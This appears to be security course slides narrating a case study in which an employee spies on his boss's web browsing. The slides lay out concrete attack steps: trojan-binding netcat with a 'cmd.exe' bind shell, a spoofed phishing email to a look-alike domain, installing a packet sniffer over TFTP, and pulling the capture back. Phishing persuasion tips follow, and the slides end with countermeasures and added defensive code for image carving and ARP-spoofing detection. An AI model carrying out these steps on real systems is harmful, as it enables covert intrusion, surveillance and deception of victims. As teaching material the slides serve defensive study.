Policy
The Boss established a new policy against surfing the web during work hours
Phoenix decides to examine the sites that the Boss is looking at by spying on him
Setup
The networked machines are connected via a switch
  ◦ Private 192.168.1.0 network
Boss’ IP: 192.168.1.5
Phoenix’s IP: 192.168.1.6
The Plan
Monitor traffic to and from the Boss’ machine
How “loud” should this approach be?
  ◦ Loud/noisy means that it could trigger alarms of IDS/IPS systems
  ◦ There might be reasons to launch a noisy attack
      Provide a distraction to another attack
      Sometimes it’s the only way to monitor traffic
Since a single host’s traffic is the target, ARP poisoning, MAC spoofing or MAC flooding will not be done
Viewing Switched Network Traffic
“Loud” methods
  ◦ Gratuitous ARP for individual hosts
  ◦ ARP poisoning
  ◦ MAC spoofing
  ◦ MAC flooding
  ◦ SPAN
      Port mirroring
Viewing Switched Network Traffic
Gratuitous ARP
  ◦ Unsolicited ARP
      The protocol allows for it, without checking for a matching ARP request (stateless!)
      An ARP reply is sent out associating the target’s IP with the collector’s MAC address
Spoof the MAC of the gateway
  ◦ Collector replies to ARP requests for the gateway’s MAC
  ◦ Switch will see the router’s MAC address on both switch ports and will send outbound traffic to both ports
MAC flooding
  ◦ Overwhelm the switch’s MAC table
      Causes the switch to “failover” into hub mode
      MACOF (http://monkey.org/~dugsong/dsniff/)
Quieter method
Capture the traffic on the target host itself
  ◦ Plant WinPcap and a Trojan horse on the host
The trick will be to install the software on the target host
  ◦ Boss will not blindly install software
      Have to convince him it’s something of value to him
The plan consists of a chained series of exploits
The Plan
Copy a web site and host it on Phoenix’s server
Bind Netcat to a legitimate executable file
Send email to boss
  ◦ Download the free executable
      Netcat will also be downloaded and installed
Connect to boss’ machine using Netcat
Use TFTP and download a WinDump program onto boss’ machine
Capture the boss’ network traffic
Analyze captured traffic
Rebuild a jpg image using a hex editor
Phishing Scam
Phoenix locates a site and plans to get his boss to visit a copied version of the site
  ◦ Lays the groundwork via some social engineering
      Tells boss of a site “certificatepractice.com” which offers a free CCNA practice exam as a promotional offer
  ◦ Uses a utility to download and mirror the site
      Wget (www.gnu.org/software/wget)
      Copy the site recursively to hard drive, with an appropriate level of hyperlinks from the 1st page
      Will also copy the practice test executable
Phoenix will bind his Trojan to this executable
Binding the Trojan
Trojan wrapper program is used
  ◦ YAB (Yet Another Binder)
      Areyoufearless.com (no longer there, however can get via BitTorrent sites)
      Altavista.net
      Packetstormsecurity.org
Add Bind File option
  ◦ Allows Phoenix to bind nc.exe
  ◦ Will execute nc (asynchronously is possible)
  ◦ Can add execution parameters when nc starts up
      -p 50 -e cmd.exe -L
Registry startup option available (default is no)
Melt stub option
  ◦ Will remove netcat after execution
Icon can be added to make the install appear legitimate
Setting up the phishing site
Overwrite the original ccna.exe file with the bound Trojan file in the phony site
Register a very similar domain name
  ◦ “certification-practice.com”
Send an email to victim
  ◦ Phoenix uses an anonymous e-mailer and spoofs the email header to have the “From:” appear as the real site
      www.mail.com
      Doesn’t require a “real” email address to register
      Victim would have to read the email message headers in order to see the real source domain
Check for spelling and grammatical errors
Offer something free or on a trial basis
Appeal to greed
  ◦ Explain why the victim is getting something for nothing
      Lowers suspicion
Appeal to the victim’s sense of self
  ◦ Self-help tools, adding to success, etc.
Brevity
Text of the email contains the link to the site
  ◦ Appears as the URL of the real site, but the hyperlink is really the phony site
Present the email to the victim
  ◦ Possibly prepare the victim for the email, adding to the enticement
Connect to the victim machine
Angry IP Scanner
  ◦ www.angryziber.com/ipscan/
  ◦ Scan IPs on the network for the IP with port 50 open and listening
  ◦ Obtain the victim’s IP address
nc to the victim’s machine on port 50
Verify the connection using ipconfig
  ◦ Will show the victim machine’s IP in the nc window
Install packet capture software
Use a command line utility
  ◦ nc does not allow for usage of a GUI (Windows) interface
Sysinternals has a TFTP server available
  ◦ Free
  ◦ No configuration required
  ◦ Windows already has a TFTP client!
Windump is downloaded
  ◦ www.winpcap.org/windump
  ◦ Placed into the default TFTP server directory (TFTP-Root)
Phoenix sets up a TFTP server on his machine
Using Netcat, Phoenix types
      tftp -i 192.168.1.6 get windump.exe windump.exe
  ◦ Syntax: tftp [-i] host [put | get] source destination
  ◦ -i switch: use binary transfer
Run Windump
Options
  ◦ -c count (packets)
  ◦ -s snaplength (length of packets captured)
  ◦ -w filename (of captured packets)
      windump -c 500 -s 1500 -w capture.log
If the victim does not have WinPcap installed, Phoenix must transfer and manually install WinPcap on the victim machine
  ◦ Windump requires WinPcap
Installing winpcap
Phoenix downloads WinPcap
Unzips it
TFTP (to the victim’s winpcap directory)
  ◦ Daemon_mgm.exe
  ◦ NetMonInstaller.exe
  ◦ Npf_mgm.exe
  ◦ Rpcapd.exe
  ◦ Uninstall.exe
Execute
      Npf_mgm.exe -r
      Daemon_mgm.exe -r
      NetMonInstaller.exe i
Analyzing the capture log
Using Netcat
      tftp -i 192.168.1.6 put capture.log
Use a packet analyzer to view the traffic
  ◦ Wireshark
A review shows the sites visited by the victim
  ◦ Includes a GET (HTTP) for a file called “gambling.jpg”
Follow TCP stream
  ◦ Capture the output as raw data
  ◦ Use a hex editor (WinHex), if required, to edit the raw data
      Remove everything before the actual binary file (HTTP commands, etc.)
      Leaves just the actual binary of the image
      Jpg starts with ÿØÿà
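The hex-editor step above, stripping the HTTP response headers so that only the image bytes remain, is the same carving any forensic analyst performs on a followed TCP stream. The code below is an added example, not from the slides or from Wireshark or WinHex: it locates the end of the headers, honours Content-Length so that later bytes in the stream are not mixed in, confirms the body starts with the JPEG start-of-image marker (the ÿØÿà on the slide is the bytes FF D8 FF E0 shown in Latin-1) and cuts at the end-of-image marker FF D9. The HTTP response and the tiny JPEG-like payload inside it are constructed for the example, not a real capture.

```python
"""Carve a JPEG out of a raw HTTP response taken from a followed TCP stream.

Added example, not from the slides: the slides do this step by hand in a hex
editor, deleting everything before the image's first bytes. This does the same
programmatically: it drops the HTTP status line and headers, honours
Content-Length so that later data in the same stream is not mixed in, confirms
the body begins with the JPEG start-of-image marker (the "ÿØÿà" on the slide is
FF D8 FF E0, the JFIF header start) and cuts at the end-of-image marker FF D9.
The response below is constructed; its body is a minimal synthetic JPEG-like
byte string, not a real picture.
"""

JPEG_SOI = b"\xff\xd8\xff"  # start of image (followed by an APPn marker byte, E0 for JFIF)
JPEG_EOI = b"\xff\xd9"      # end of image


def split_http_response(raw):
    """Return (status_and_headers_text, body_bytes); headers end at the first blank line."""
    sep = raw.find(b"\r\n\r\n")
    if sep < 0:
        raise ValueError("no end of HTTP headers found")
    return raw[:sep].decode("latin-1"), raw[sep + 4:]


def content_length(header_text):
    """Parse Content-Length from the header block, or None if absent."""
    for line in header_text.split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-length":
            return int(value.strip())
    return None


def carve_jpeg(raw):
    """Return the JPEG bytes carried by an HTTP response, or None if there is none."""
    headers, body = split_http_response(raw)
    length = content_length(headers)
    if length is not None:
        body = body[:length]  # without it, trailing stream data could hide a stray FF D9
    start = body.find(JPEG_SOI)
    if start < 0:
        return None
    end = body.rfind(JPEG_EOI)
    if end < start:
        return None
    return body[start:end + len(JPEG_EOI)]


# Constructed sample: a tiny synthetic JFIF-style payload inside an HTTP response,
# followed by unrelated trailing bytes from the same TCP stream.
FAKE_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
             + b"\x00" * 16 + b"\xff\xd9")
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\n"
                   + b"Content-Length: " + str(len(FAKE_JPEG)).encode() + b"\r\n\r\n"
                   + FAKE_JPEG + b"HTTP/1.1 304 Not Modified\r\n\r\n")

if __name__ == "__main__":
    image = carve_jpeg(SAMPLE_RESPONSE)
    print("carved", len(image), "bytes starting with", image[:4].hex())
```

Writing the returned bytes to a file with a .jpg extension gives the rebuilt image; on a real capture, a response using chunked transfer encoding or gzip would need the body decoded first, which this example does not do.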
Finale
Anonymous note left on the victim’s desk highlighting the activity
Internet usage policy relaxed the next day
Countermeasures
Phishing
  ◦ Training!
  ◦ Spam filters / phishing filters
Trojan horse
  ◦ Anti-virus software
      Latest signatures
      However, organizations will alter the Trojan (for a price) so that it does not match a signature
        EliteC0ders (no longer offers this “service”)
  ◦ Software policy
Sniffing
  ◦ Port security on switches
      Protects against ARP poisoning, MAC spoofing and MAC flooding
  ◦ IPS
      PromiScan
  ◦ Host based IDS
      Cisco Secure Agent
      Warns if a new application is launching
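The sniffing countermeasures above, and the "loud" methods described on the Viewing Switched Network Traffic slides, both come down to the same observation: gratuitous ARP, ARP poisoning, gateway MAC spoofing and MAC flooding all leave a visible pattern in the ARP frames a switch forwards. The code below is an added example, not from the slides or from any IDS, PromiScan or Cisco product they name: a small monitor, fed from a SPAN/mirror port, that keeps the IP-to-MAC table an IDS keeps and raises one event for each of those patterns. The frame records, the MAC addresses, the gateway address 192.168.1.1 and the per-port MAC limit are constructed assumptions; only the 192.168.1.0 network and the .5/.6 hosts come from the slides.

```python
"""Detect the "loud" switched-network sniffing methods from a stream of ARP frames.

Added example, not from the slides: the slides list gratuitous ARP, ARP
poisoning, gateway MAC spoofing and MAC flooding as the noisy ways to see
switched traffic, and port security plus IDS as the countermeasures. This
monitor keeps the IP-to-MAC table an IDS keeps and raises an event for each
pattern. Frames, MAC addresses, the gateway IP and the per-port limit are
constructed assumptions; only the 192.168.1.0 network comes from the slides.
"""
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"  # assumption: the slides never state the gateway address
PORT_MAC_LIMIT = 3          # port-security style cap on source MACs per switch port


class ArpMonitor:
    def __init__(self, gateway_ip=GATEWAY_IP, mac_limit=PORT_MAC_LIMIT):
        self.gateway_ip = gateway_ip
        self.mac_limit = mac_limit
        self.ip_to_mac = {}                 # learned sender IP -> sender MAC
        self.pending = set()                # (requester IP, asked-about IP) awaiting a reply
        self.gateway_ports = set()          # switch ports on which the gateway IP was claimed
        self.port_macs = defaultdict(set)   # switch port -> source MACs seen
        self.events = []

    def feed(self, frame):
        """Process one ARP frame dict with keys op, port, smac, sip, tip."""
        op, port = frame["op"], frame["port"]
        smac, sip, tip = frame["smac"].lower(), frame["sip"], frame["tip"]

        # MAC flooding: far more source MACs on one access port than hosts behind it
        self.port_macs[port].add(smac)
        if len(self.port_macs[port]) == self.mac_limit + 1:
            self.events.append(("mac_flood", port, self.mac_limit + 1))

        if op == "request":
            self.pending.add((sip, tip))
        else:
            if sip == tip:
                # gratuitous ARP: a host announces an IP without being asked
                self.events.append(("gratuitous_arp", sip, smac))
            elif (tip, sip) not in self.pending:
                # a reply nobody asked for: the stateless protocol lets it through
                self.events.append(("unsolicited_reply", sip, smac))
            self.pending.discard((tip, sip))
            if sip == self.gateway_ip:
                self.gateway_ports.add(port)
                if len(self.gateway_ports) == 2:
                    # the router's address now appears on two ports: MAC spoofing
                    self.events.append(("gateway_on_multiple_ports", sorted(self.gateway_ports)))

        # ARP poisoning: a known IP suddenly maps to a different MAC
        known = self.ip_to_mac.get(sip)
        if known is not None and known != smac:
            self.events.append(("ip_mac_changed", sip, known, smac))
        self.ip_to_mac[sip] = smac


def run_monitor(frames):
    """Feed every frame to a fresh monitor and return the events it raised."""
    monitor = ArpMonitor()
    for frame in frames:
        monitor.feed(frame)
    return monitor.events


# Constructed frames: one normal lookup, then each noisy pattern in turn.
SAMPLE_FRAMES = [
    dict(op="request", port=5, smac="aa:aa:aa:00:00:05", sip="192.168.1.5", tip="192.168.1.1"),
    dict(op="reply",   port=1, smac="aa:aa:aa:00:00:01", sip="192.168.1.1", tip="192.168.1.5"),
    # gratuitous reply on port 6 claiming the .5 host's IP with a different MAC
    dict(op="reply",   port=6, smac="aa:aa:aa:00:00:06", sip="192.168.1.5", tip="192.168.1.5"),
    # port 6 also answers for the gateway IP using the gateway's own MAC
    dict(op="reply",   port=6, smac="aa:aa:aa:00:00:01", sip="192.168.1.1", tip="192.168.1.5"),
] + [
    # burst of never-seen source MACs on port 6
    dict(op="request", port=6, smac=f"de:ad:be:ef:00:{i:02x}", sip=f"10.0.0.{i + 1}", tip="10.0.0.254")
    for i in range(4)
]

if __name__ == "__main__":
    for event in run_monitor(SAMPLE_FRAMES):
        print(*event)
```

Port security on the switch enforces the same per-port MAC limit in hardware, which is why the slide lists it as the protection against all three ARP-layer methods; the monitor is the software view of the same rule, plus the IP-to-MAC change check that a host-based IDS would apply to its own ARP cache.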